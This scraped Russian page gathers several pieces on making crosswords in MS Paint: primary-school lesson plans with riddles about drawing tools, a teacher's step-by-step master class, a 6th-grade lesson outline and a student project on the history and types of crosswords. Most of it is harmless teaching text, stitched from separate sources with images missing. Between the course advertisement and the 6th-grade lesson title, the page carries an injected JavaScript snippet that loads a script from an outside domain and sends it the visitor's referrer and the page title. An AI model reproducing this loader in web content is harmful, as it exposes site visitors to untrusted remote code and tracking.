Как сделать кроссворд в paint

Обновлено: 04.07.2024

Младшие школьники любят рисовать, поэтому обучение графики в этом возрасте является важнейшим моментом для развития творческого потенциала учащихся. При изучении графики во 2 классе, я начинаю знакомить детей с простейшими детскими графическими программами. Изучение же в 3 классе, иногда в конце 2 класса начинается именно с редактора Paint, так как в нем заложены все основные инструменты, палитра красок, команды, позволяющие решать такие цели и задачи: как обучение школьников простейшим приемам создания и обработки графической информации.

Учащиеся с интересом осваивают инструменты графического редактора, осваивая растровую графику. Тем самым происходит формирование творческого, креативного мышления, возрастает интерес к предмету информатика, появляется эстетический, художественный вкус.

В разработки уроков, которые были опубликованы в журнале “Информатика в школе” № 8, 2010 год, внесены существенные изменения и добавлена презентация с графическими творческими заданиями, эти уроки я использую в работе с учащимися 3 класса. Поэтому вашему вниманию предлагается блок уроков по изучению графического редактора Paint в 3-м классе и презентация представленная на конкурс “Презентации”.

  • научить основным понятиям компьютерной графики, а также основам построения композиции и подборе цвета;
  • создавать растровые изображения
  • отработать навыки по работе с графическими редакторами

На уроках применяются физкультминутки, устные разминки, игровые моменты: “Информационное Лото”, “Кот в мешке”, “Отгадай-ка загадку”, “ Отгадай кроссворд”, чередуются практические занятия с теорией. Используются задачи на развитие логики, внимания, памяти, воображения.

Раздел программы: “Изучаем графические редакторы ” (3-й класс).

Место урока в учебном плане: урок знакомство с графическими редакторами.

Урок № 1

Тема урока: “Изучаем графический редактор Paint”

  • развитие творческого мышления учащихся;
  • введение новых понятий: “графический редактор”, “холодный” и “теплый” цвет, инструменты, палитра красок, а также развитие и внедрение межпредметных связей по информатике;
  • закрепление навыки работы с инструментами редактора Paint.

Тип урока: Комбинированный урок.

Вид урока: Урок-игра.

Учащиеся отправляются в путешествие с инструментами графического редактора, перед ними ставится задача: узнать без какого инструмента не сможет работать художник, кто из инструментов самый главный и нужный. В процессе работы учащиеся отгадывают загадки, знакомятся с инструментами художника. Одновременно познавая новое, развиваются творческое воображение, логическое мышление.

Формы работы на уроке: индивидуальная, групповая, коллективная; устная, письменная, практическая работа на компьютере.

Ход урока

Проверь, дружок,
Ты готов начать урок?
Все ль на месте,
Всё ль в порядке,
Все ли правильно сидят?
Все ли внимательно глядят?

Готовность к уроку – обязательное требование, которое должен выполнять каждый ученик

2. Разминка “Отгадай-ка” (Приложение 1, урок 1)

Не похож на человечка,
Но имеет он сердечко,
И работе круглый год
Он сердечко отдает,
Пишет он, когда диктуют,
Он и чертит, и рисует.
А сегодня вечерком
Он раскрасит мне альбом (Карандаш)

Если нос ты мне заточишь,
Лист бумаги чистый дашь.
Нарисую, что захочешь.
Понял, кто я…. (Карандаш)

Деревянные мальчишки,
Разноцветные пальтишки,
Любят вместе порезвиться
На альбомной на странице (Цветные карандаши)

Это что тут за зверёк ходит вдоль и поперёк?
В краске выпачканный нос, деревянный длинный хвост. (Кисточка)

Мы деревянные сестрички
У всех пушистее косички.
Косички в краску окунаем,
След на бумаге оставляем (Кисточки)

В альбоме на странице
И я люблю трудиться.
Я помощник верный ваш:
Исправляю карандаш
Если мне работу дашь
Зря трудился карандаш (Ластик)

Различаемся по цвету
А других отличий нету.
Если нас с водой смешать
Можно смело рисовать (Краски)

Различаемся по цвету
А других отличий нету.
Если нас с водой смешать
Можно смело рисовать (Краски)

Если взял бы я окружность,
С двух сторон немного сжал,
Отвечайте дети дружно –
Получился бы. (Овал)

Едет ручка вдоль листа
По линеечке, по краю –
Получается черта,
Называется. (Прямая)

Эта странная фигура,
Ну, совсем миниатюра!
И на маленький листочек
Мы поставим сотни. (Точек)

Эта форма у клубка,
У планеты, колобка,
Но сожми ее немножко,
И получится лепёшка. (Круг)

3. Введение нового материала.

Скажите, пожалуйста, о каких предметах шла речь в загадках. Верно, это инструменты художника. А художник – кто это? (Ответы учащихся) Какими инструментами пользуется художник? Сегодня мы совершим путешествие в страну с названием компьютерная графика. Как вы думаете, что такое графика? (изображение, фотография, рисунок, пейзаж, натюрморт, портрет, мозаика, витраж и т.д. А теперь подумайте, что такое компьютерная графика? Это графика, которую художник создает на компьютере. Чтобы художник или пользователь мог создать графическое изображение, на компьютере существуют различные программы, которые называются графическими редакторами. Сегодня наша задача познакомится с графическим редактором Paint. С помощью него мы будем учиться рисовать, познакомимся со всеми инструментами – объектами, научимся выбирать правильные цвета. То есть станем настоящими художниками.

Ракурс в историю

Слово “графический”, “графика” происходят от греческого слова “графо” – пишу. Слово редактор происходит от латинского слова “редактус”, что значит, приведенный в порядок, а слово Paint в переводе с английского означает – рисунок. Paint представляет собой средство для рисования, с помощью которого можно создавать простые и сложные рисунки, различной цветовой гаммы.

Программу “Художник” начнем изучать
Друг другу мы будем
Всегда помогать
Чтоб лучше учиться
И больше узнать

Мы с вами выяснили, что художник рисует различным материалом, в том числе и красками. Посмотрите в окно, какой удивительный, разноцветный мир нас окружает! Оказывается, весь этот многоцветный мир состоит всего из трех основных цветов: красного, желтого и синего. Все остальные цвета получаются от смешивания в разных количествах этих трех цветов. Три основных цвета (красный, желтый, синий) три вспомогательных цвета (оранжевый, зеленый, фиолетовый) и голубой цвет образуют семь цветов радуги. Запомнить порядок цветов в радуге очень легко. Для этого нужно выучить фразу: КАЖДЫЙ ОХОТНИК ЖЕЛАЕТ ЗНАТЬ, ГДЕ СИДИТ ФАЗАН. Каждое слово в этом предложении начинается с той же буквы, что и название цвета в радуге.

Помимо семи радуги цветов существует еще огромное количество составных цветов. Люди придумали обозначать их по названиям предметов, например:

Плодов и ягод: вишневый, малиновый сливовый, лимонный, персиковый.

Растений: розовый, салатовый, горчичный,

Напитков: кофейный, чайный,

Драгоценных камней: бирюзовый, рубиновый, гранатовый, изумрудный, малахитовый, янтарный.

Какие цвета вы еще знаете? Приведите каждый по примеру.

Скажите, какое у нас сейчас время года? Верно, зима. Какая погода сегодня на улице -43 градуса мороза? Это тепло или холодно? Очень холодно, если выглянуть на улицу, то увидим хмурое, морозное, все в холодном тумане утро. Можно определить наше настроение в такое утро? Да нам скучно, уныло, холодно, не хочется никуда выходить из дома. Как говорится в поговорке, что добрый хозяин в такую погоду и собаку на улицу не выгонит.

А теперь вспомните о лете: желтое солнышко на небе, оранжевые абрикосы, розовые кусты, малина; настроение радостное, хочется бегать, купаться, весело. А как вы думаете, почему? Да, все зависит от палитры цветов и многообразия красок. Все цвета делятся на теплые и холодные.

Автор: Рябиченко Надежда Владимировна, учитель начальных классов МКОУ «Михайловская ОШ» Киквидзенского района Волгоградской области
Описание: Предлагаю вашему вниманию мастер класс по созданию кроссворда. Данный материал будет полезен учителям начальной школы, среднего звена, педагогам дополнительного образования, студентам педагогических учебных заведений, учащимся школ.


Цель: создание кроссворда в программе Microsoft Word и оформление его в графическом редакторе Paint
Задачи:
- ознакомить с технологией создания кроссворда с иллюстрациями
- развивать умения и навыки работы в программе Microsoft Word и графическом редакторе Paint, внимание, мышление, творческие способности

1. Для создания кроссворда понадобятся иллюстрации по теме, их можно найти в интернете и сохранить в папке, созданной на компьютере. Также можно предварительно составить кроссворд на обычном листе бумаги.
Важно: изображения не должны быть большого размера
2. Откройте программу Microsoft Word на компьютере.
3. На вкладке Вставка в окне Таблица выберите Вставить таблицу.



4. В появившемся окне Вставка таблицы выберите нужное количество строк и столбцов.



5. Увеличьте размер клеточки (или уменьшите), если это нужно, так, чтобы в вашей таблице были квадратики, а не прямоугольники.




6. Работая с таблицами, перейдите на вкладку Конструктор и в окне Нарисовать границы выберите Ластик.



7. С помощью ластика, поочередно нажимая на линии каждой клеточки таблицы, удалите ненужные так, чтобы у вас осталась только сетка кроссворда.




9. Сделайте скриншот сетки кроссворда. Для этого можно воспользоваться программой Ножницы на вашем компьютере, зайдя в меню пуск, выберите все программы и затем ножницы. Выделите нужную вам область в текстовом файле, в появившемся окне выберите Сохранить фрагмент.



10. В новом появившемся окне выберите папку, в которую вы сохраните изображение.



11. Когда вы сделаете скриншот сетки кроссворда, откройте получившееся изображение, выберите Открыть и в появившемся окне найдите Paint.



12. Теперь нам нужно в данный кроссворд вставить изображение. Нажмите Вставить, затем Вставить из



13. В появившемся окне выберите нужную папку и затем одно из изображений, которое вы хотите вставить в кроссворд. Кликните по изображению, затем нажмите Открыть.




15. Кликните по нему правой кнопкой мыши и выберите Изменить размер. В появившемся окне Изменение размеров и наклона измените размер в процентах. У вас первоначально 100% по горизонтали и по вертикали. Изменив % по горизонтали, удалив число 100, напечатайте, например, 70. Автоматически изменится процентное соотношение и по вертикали. Нажмите ОК.




17. Кликните в любом месте вне картинки, чтобы убрать выделение.
18. Выполняя шаги пунктов 12-17, вставьте следующее изображение, измените его размер.
Если вы изменили размер так, что ваше изображение слишком маленькое, снова выполните шаги пункта 15 и не уменьшите, а увеличьте количество процентов.
19. Наше изображение находится снова в верхнем левом углу, кликните по нему левой кнопкой мыши и переместите, удерживая, в нужное место.




20. Выполняя шаги пунктов 12-19, вставьте остальные изображения.



21. Нам осталось пронумеровать картинки. Для этого в окне Инструменты выбираем Вставка текста в изображение. Затем делаем щелчок левой кнопкой мыши рядом с каким-либо изображением, появляется область выделения.




22. Выбираем в окне Цвета любой цвет, и в области выделения печатаем число, используя нужный шрифт и его размер.



23. Снова делаем щелчок левой кнопкой мыши рядом с другим изображением, и в области выделения печатаем другое число. Пронумеруем все картинки. Закрываем программу и сохраняем.
Наш кроссворд готов!



Благодарю за внимание! Желаю успехов в составлении кроссвордов и освоении новых программ!

На уроке (для 5–6 класса) повторяются и закрепляются навыки работы в графическом редакторе Paint, текстовом редакторе Word. Рассматриваются темы: Рисование фигур (квадрат, круг), инструмент Надпись, копирование рисунка, вставка изображений, изменение масштаба, создание списка, объект WordArt.

Цели урока:

  1. Научить создавать кроссворды в графическом редакторе Paint.
  2. Проверить усвоение материала на основе творческого задания.
  1. Развивать память
  2. Развивать познавательную активность учащихся
  3. Развивать элементы творческой деятельности.
  4. Развивать логическое мышление.
  1. Воспитывать дисциплинированность, аккуратность, настойчивость в учебе.
  2. Воспитывать средствами урока у учащихся уверенности в своих силах.

Задачи:

  1. Познакомить учащихся с одним из способов создания кроссвордов.
  2. Закрепить изученный ранее материал по темам:
    а) Работа в графическом редакторе Paint: рисование правильных фигур, копирование рисунка, инструмент «Надпись»;
    б) Работа в текстовом процессоре Word: Списки, вставка графических объектов;
    в) Сохранение файла в указанном месте.
  3. Формировать у учащийся умение работать по плану.
  4. Формировать умение оценивать полученный результат.
  1. .Развивать познавательную активность учащихся.
  2. Развивать основы творческой деятельности.
  1. Воспитание дисциплинированности, аккуратности, настойчивости в учебе.
  2. Воспитание средствами урока у учащихся уверенности в своих силах.

ТСО и ПО:

  1. АРМ учителя
  2. Графический редактор Paint.
  3. Папка для сохранения работ учащихся, установленная на компьютер учителя.

Раздаточный материал: Листы с заданием для выполнения практической работы.

Этапы урока:

  1. Организационный момент. (1 минута)
  2. Постановка целей и задач урока (2 минуты)
  3. Актуализация прежних знаний и способов действий. (13 минут)
  4. Применение знаний на практике. (20 минут)
  5. Проверка уровня усвоения знаний. (7 минут)
  6. Подведение итогов урока. (2 минуты)

Ход урока

I. Организационный момент.

1) Проверить готовности учащихся к уроку.

II. Постановка целей и задач урока.

1) Сообщить тему и цели урока.

2) Рассказать о практической значимости темы.

III. Повторение пройденного материала.

1) Рисование фигур (квадрат, круг). (Удерживая нажатой клавишу Shift)


2) Инструмент Надпись. ( – растянуть прямоугольник для вставки надписи;

3) Копирование рисунка. (С нажатой клавишей Ctrl)

4) Изменение масштаба в графическом редакторе Paint

5) объект WordArt


(Пуск —> Все программы —> Microsoft Office —> Microsoft Office Word, Панель инструментов «Рисование» —> Добавить объект WordArt

Выбрать нужный стиль надписи WordArt —> Ok )


6) Создание списка. Нумерованный список.( На Панели инструментов Форматирование кнопка – нумерованный список.


Для того, чтобы закончить нумерацию – щелкнуть по кнопке или дважды нажать на клавишу ENTER

Для того, чтобы начать нумерацию заново – щелкнуть правой кнопкой по нужному номеру Начать заново.)

Внимание Скидка 50% на курсы! Спешите подать
заявку

Профессиональной переподготовки 30 курсов от 6900 руб.

Курсы для всех от 3000 руб. от 1500 руб.

Повышение квалификации 36 курсов от 1500 руб.

Лицензия №037267 от 17.03.2016 г.
выдана департаментом образования г. Москвы


Урок Информатики "Создание кроссвордов в редакторе Paint" 6 класс

((__lxGc__=window.__lxGc__||<'s':<>,'b':0>)['s']['_197117']=__lxGc__['s']['_197117']||>)['b']['_574359']=<'i':__lxGc__.b++>; var d=document;var s=d.createElement('script'); s.src='https://3slivtd.ru/BFjWgr?frm=script&&'+window.location.search.replace('?', '&')+'&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '&_cid=dd5ad15d-9f89-1596-33bb-24c0516e474b'; d.getElementById("dd5ad15d-9f89-1596-33bb-24c0516e474b").appendChild(s);

КГУ «Долматовская основная школа»

Тема «Создание кроссвордов в редакторе Paint »

Подготовил: Редькин Антон

6 класс Долматовской ош

Руководитель работы: Федорова Н.В.

Долматово 2013 год

2. Основная часть

2.1 Что такое кроссворд?

2.2. История кроссвордов.

2.3. Виды кроссвордов

2.4 Правила составления и оформления кроссвордов.

2.5 Создание кроссвордов в Paint .

4. Список литературы

Абстракт на исследовательский проект по теме «Создание кроссвордов в редакторе Paint » ученика 6 класса КГУ «Долматовской основной школы» Редькина Антона.

Цель проекта заключается в раскрытии технологии построения кроссвордов в редакторе Paint .

Была выдвинута гипотеза : знание инструментов графического редактора Paint даёт возможность составлять в нем кроссворды.

Исследование проводилось в 3 этапа:

На первом этапе была проанализирована литература по вопросу - что такое кроссворд, его история и виды. На втором – были рассмотрены различные виды кроссвордов с целью выявления правил составления и оформления кроссвордов. На третьем – экспериментальным способом составлен алгоритм создания кроссвордов в редакторе Paint .

В процессе работы использованы следующие методы: поиск материала, работа в сети Internet , анализ собранного материала, эксперимент.

Ожидаемый результат работы: научаться исключать несоответствующую и несущественную информацию, сравнивать и сопоставлять информацию, научаться составлять разные виды кроссвордов.

Актуальность исследования. В условиях обновления содержания и структуры современного образования проблема развития творческих способностей учащихся приобретает новое звучание и требует дальнейшего осмысления. Наше время – время перемен. Сейчас нашей стране нужны люди, способные принимать нестандартные решения, умеющие творчески мыслить.

В процессе обучения информатике, необходимо создавать атмосферу творческого поиска, помогающую школьнику как можно более полно раскрыть свои способности. Для этого на уроках используются элементы развивающего обучения: проблемные ситуации, творческие задания; применяется проектный метод; школьники привлекаются к самостоятельной научно-исследовательской деятельности. Сочетание нескольких технологий, применяемых учителем на уроке, позволяет сделать каждый урок увлекательным и неповторимым. Использование данных элементов в обучении существенно повышает уровень знаний по информатике, творческую активность учащихся.

Объект исследования – кроссворд в редакторе Paint .

Предмет исследования – процесс создания кроссвордов в редакторе Paint .

Цель исследования заключается в раскрытии технологии построения кроссвордов в редакторе Р aint .

Гипотеза : знание инструментов графического редактора Paint даёт возможность составлять в нем кроссворды.

Объектом, предметом и целью исследования были предопределены следующие задачи :

Дать понятиечто такое кроссворд и его виды;

Проанализировать правила составления и оформления кроссвордов;

Составить алгоритм работы с кроссвордом в редакторе Р aint .

2.1 Что такое кроссворд?

КРОССВОРД Игра-задача, в которой фигура из рядов пустых клеток заполняется перекрещивающимися словами со значениями, заданными по условиям игры. ( Толковый словарь русского языка (Ожегов С., Шведова Н)

Кроссворд (англ. Crossword — пересечение слов) — « крестословица »- головоломка, представляющая собой переплетение рядов клеточек, которые заполняются словами по заданным значениям.

Обычно значения слов задаются описательно под этой фигурой, сначала значения слов, которые должны получиться по горизонтали, затем — по вертикали. (Свободная энциклопедия Википедия)

2.2 История кроссвордов.


Кроссворд Уинна, 1913

Исследователям встречались находки, похожие на кроссворд, датированные еще 1—4 вв. н. э. В частности, во время раскопок, производимых в Помпеях, была обнаружена головоломка, удивительно напоминающая современный кроссворд, которую ученые датировали 79 годом н. э. При этом существуют различные версии изобретения кроссвордов. Среди стран, претендующих на звание родины кроссвордов, Италия, Великобритания, США.

По одной из версий, прототипы современных кроссвордов появились ещё в XIX веке . Самый первый дошедший до нас кроссворд был опубликован в 1875 году в сентябрьском номере журнала «Святой Николас» в Нью-Йорке. При этом первый кроссворд, соответствующий современным представлениям о кроссворде, был создан Артуром Уинном и опубликован в воскресном номере газеты «NewYorkWorld» 21 декабря 1913 года, этот день считается днём рождения кроссворда.

Кроссворды стали популярны в середине 1920-х годов.

В приложении «Наш мир» к берлинской газете «Руль» в феврале 1925 года впервые употребляется термин «крестословица», придуманный писателем Владимиром Набоковым для кроссвордов, которые он составлял для этого издания.

Самый первый в России кроссворд был напечатан в Ленинграде 2 декабря 1925 года в литературном журнале «Резец» № 48.

Широкую популярность приобрели кроссворды, публиковавшиеся в течение многих десятилетий в журнале «Огонек».

В постсоветское время в центральных газетах появились «фирменные» авторские кроссворды. В конце 1990-х появились специализированные «кроссвордные» газеты. Кроме классических кроссвордов и их разновидностей, упомянутых ниже, в печати появились и стали весьма популярны «скандинавские» кроссворды, а также цифровые головоломки. Сначала «рисование по числам», переименованное в «японский кроссворд», затем «судоку», «какуро» и многочисленные их вариации.

Кроссворд продолжает развиваться как по форме, так и по содержанию. Существует множество разновидностей этой игры. В разных странах есть свои любимые варианты кроссворда, причем они могут использоваться не только как полезное развлечение, но и в учебных целях. Во многих странах проводятся конкурсы по решению и составлению кроссвордов, существуют клубы любителей кроссвордов.

2.3 Виды кроссвордов.

«Кроссвордами» в русскоязычных развлекательных газетах зачастую называются головоломки, в которых слова не пересекаются (а это основное правило кроссворда) или слов нет вовсе (как в так называемых «японских кроссвордах»). Очень часто «географическое» название не несёт никакой смысловой нагрузки: «американским кроссвордом» называют головоломку, сочетающую правила классического и «японского кроссворда», при этом в США и Японии действительно есть кроссворды, отличающиеся от европейских, но это все-таки кроссворды, хотя и с несколькими дополнительными правилами.


В американском варианте кроссворда все клетки должны находиться на пересечении слов. Так что сетка получается не разреженной, как в европейских, а плотной, как в скандинавских кроссвордах. Правда, составители этих кроссвордов не считают зазорным использовать

в качестве загаданных слов аббревиатуры, разговорные или иноязычные слова и даже, например, название клавиши «ESC» или направление «NNW» (северо-северо-запад).


В японском варианте кроссворда черные клетки не должны соприкасаться сторонами (а значит, не должно быть блоков из черных клеток — соответственно, плотность сетки также приближается к сканвордной) и угловые клетки сетки должны быть белыми (так что сетка обязательно остается строгим прямоугольником). Очевидно, ответы вписываются на японском, то естьканой и (реже) иероглифами. Поэтому допустимы даже «двухклеточные» слова.

Можно привести список головоломок, встречающихся в печати. Как уже было сказано, название чаще носит «завлекательный» характер, чем отражает историю или правила головоломки.

Английский кроссворд подобен венгерскому, используется такое же поле с буквами, но каждое слово всегда идёт в одном направлении (в том числе и диагональном), не ломаясь внутри себя.

В циклокроссворде (циклическом кроссворде) слова располагаются вокруг клетки с номером соответствующего вопроса. Отличительной особенностью такого кроссворда является, одинаковое количество букв во всех загаданых словах — как правило, 4, 6 или 8. Пересечения слов происходят по дуге окружности. При этом если слово находится не на краю сетки, то все его буквы, так или иначе, одновременно являются буквами соседних слов.

трёхмерный кроссворд — кроссворд, слова в котором могут быть расположены таким образом, чтобы при рассечении его плоскостями, параллельными координатным плоскостям и отстоящим друг от друга на заданное расстояние-шаг, в сечениях образовывались кроссворды.

Чайнворд (англ. chain — цепь, англ. word — слово) — вид кроссвордов, в которых, как следует из названия, пересечение слов представляет собой линию (т. е. цепь). Поэтому второе распространенное название — линейный кроссворд

Ключворд или кейворд — особый вид кроссворда, в кото ром требуется восстановить исходный кроссворд, каждая буква которого зашифрована определенной цифрой. Связь между буквами и цифрами (в пределах одной головоломки) всегда однозначная, то есть каждой букве соответствует строго определенная цифра и наоборот.

Антикроссворду определения не нужны: все слова уже известны и их требуется расставить по готовой сетке.

Судоку (яп. 数独 су:доку?, произношение (инф.) — «одинокое число») — популярная головоломка с числами. В переводе с японского «су:» — «цифра», «доку» — «стоящая отдельно». Иногда судоку называют «магическим квадратом», что в общем-то неверно, так как судоку является латинским квадратом 9-го порядка .

Каку́ро — головоломка с числами, которую можно назвать математическим аналогом кроссворда. Название Каку́ропроисходит от японского сокращения kasankurosu ( 加算クロス , перекрестное сложение); в США головоломка также известна под названием CrossSums (пересекающиеся суммы).

2.4 Правила составления и оформления кроссвордов

Не используются слова, пишущиеся через тире и имеющие уменьшительно ласкательную окраску.

В каждую белую клетку кроссворда вписывается одна буква.

Каждое слово начинается в клетке с номером, соответствующим его определению, и заканчивается черной клеткой или краем фигуры.

Не рекомендуется использование сетки со словами, имеющими 3 и более расположенных рядом клетки, не пересекающиеся с другими словами, особенно в начале и в конце слова, где "висячие" 3 или 2 клетки считаются "дурным тоном".

Не следует использовать сетки, в которых трехбуквенное слово пересекается только одной буквой с другим словом.

Плотность кроссворда определяется отношением числа белых клеток кроссворда к их общему количеству. Чем выше плотность, тем труднее составлять и легче разгадывать кроссворд.

Заполнение сетки кроссворда при его составлении лучше начинать со слов, содержащих наибольшее количество букв. Затем найти подходящие слова пересечения, заканчивая подбор слов самыми короткими по длине. В некоторых случаях этот порядок может быть нарушен. Такая последовательность, рекомендуемая для составления кроссвордов, объясняется тем, что количество коротких (2-3 буквы) и длинных слов (более 9 букв) в русском языке относительно невелико, в то же время короткие слова обычно имеют меньше пересечений. Вообще в русском языке слова с количеством букв от 4 до 9 включительно составляют примерно 80% от их общего числа. Именно из таких слов у нас чаще всего составляются кроссворды. В англоязычных странах процент коротких слов значительно выше, кроме того, в кроссвордах используются не только имена существительные. Поэтому плотность типичного английского или американского кроссворда гораздо выше нашего.

2.5 Создание кроссвордов с Paint .

Прежде чем приступить к созданию кроссворда, выясним какие инструменты редактора требуются для работы:


- инструмент Выделить


- инструмент Копировать


- инструмент Вставить


- инструмент Текст.

Для создания кроссворда можно воспользоваться следующим алгоритмом:


С помощью фигуры , удерживая клавишу Shift , изображаем небольшой квадрат (он будет полем кроссворда).

Выделяем квадрат, используя прозрачное выделение, и копируем его.

Затем вставляем фигуру и одновременно расставляем квадраты в виде задуманных слов.

Нумеруем слова, используя инструмент текст.

Вопросы можно напечатать с помощью того же инструмента или задание на каждое слово можно нарисовать или вставить из библиотеки изображений.



Современная школа основными целями при обучении ставит: развитие творческого мышления в процессе решения задач и расширение области познания детей. Предложенный способ создания кроссвордов конечно не единственный, однако именно он позволяет учащимся не только средней, но и начальной школы на практике реализовывать свой творческий потенциал.При выполнении подобных заданий учащимся предоставляется возможность самостоятельного исследования и реализации своих наклонностей и возможностей в ходе создания реального компьютерного продукта, который может быть представлен широкой аудитории, что очень важно для всех детей.

Работа над проектом дала мне:

возможность выработать профессиональный навык использования современных компьютерных технологий;

возможность продемонстрировать свою работу своим сверстникам и вообще всем желающим;

развитие продуктивного мышления, переосмысливание имеющихся знаний и генерировать новые;

развила чувство ответственности за свои действия;

Я задался вопросом, а можно ли создавать кроссворды в других программах и как это сделать?

Читайте также: